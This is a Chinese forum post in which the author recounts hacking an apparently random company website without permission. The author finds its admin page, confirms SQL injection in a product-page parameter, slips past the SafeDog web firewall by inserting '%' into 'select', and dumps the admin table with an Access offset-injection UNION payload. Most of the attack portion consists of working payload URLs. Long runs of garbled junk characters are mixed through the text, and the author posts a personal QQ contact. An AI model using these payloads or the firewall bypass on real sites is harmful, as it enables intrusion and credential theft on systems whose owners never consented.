打开网站,一个企业站。
; x% i0 \& a( a" a7 [' W) v
; N. {6 ~8 Z1 L4 v a T3 D x: j3 S- S' X# L
顺手加个admin5 _: l. Y% Q' t& e
* y" k i @ G0 J
, w% c" v; U$ V9 `# g默认后台。" k1 T& t% ^) _1 t1 W! j" [
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
9 ?/ J2 m" b1 p% d% V5 ~8 c7 y5 R8 _; `3 R, }3 v
6 b0 f- t) U5 y# [4 C/ J
: ~4 j3 j* x* ], ^所以就不用御剑扫了,待会直接封IP。
, I( k' B" y [5 Q! h9 x
# `- I' b# m* y" m用order by语句判断是否存在注入。 c- R7 c* R5 g& R9 A! Q" C/ b% Z
http://www.xxx.com /product_show.asp?id=997 order by 1
7 t. y$ r* j5 `/ qhttp://www.xxx.com /product_show.asp?id=997 order by 100/ M% R( d \7 Y
现在存在注入,经测试后发现是9个字段。
( R$ [* W0 G4 C" a0 z1 j; \
" N7 _2 X! R. t `+ a" Z接下来进行联合查询,猜是否存在admin表。
/ o, @1 C8 q; ^; Y9 E6 v8 {& B) a- ^http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
3 u, M9 @% s% N' i" a* w) ?' Q6 K1 W5 F
3 ]6 l+ x. [& |- f& L9 k. v" D4 w8 r3 V5 f: o4 ` l# r
在select中间加个%,se%lect绕过安全狗。
& A6 ]3 I: g6 S/ T: o. t8 R( D
5 k: p! J7 j: }1 J
/ I) _6 V4 x' x+ f5 b2 z发现存在admin表,然后开始手工猜常用的字段。
% P$ C |' G1 @# b纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。) Q) f; d5 k8 g. ]
8 C2 s- k* v+ B5 B# u: S7 M0 _突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。5 d1 f: t) O- e w0 m, f% m$ l2 A
5 P4 D$ A1 k- t4 O7 N科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
5 ~5 B- B6 A( `: ?* x% Ghttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
+ B/ o+ [* u' ~1 K好了,敏感内容出显了。1 d% X/ N* j4 d- v$ m
# }: l5 e0 I# m4 o8 e! U n4 E
% s: I m* A' N( C0 ^9 s8 p6 ]& G0 a1 J- M; A& a7 t) h% g5 J
|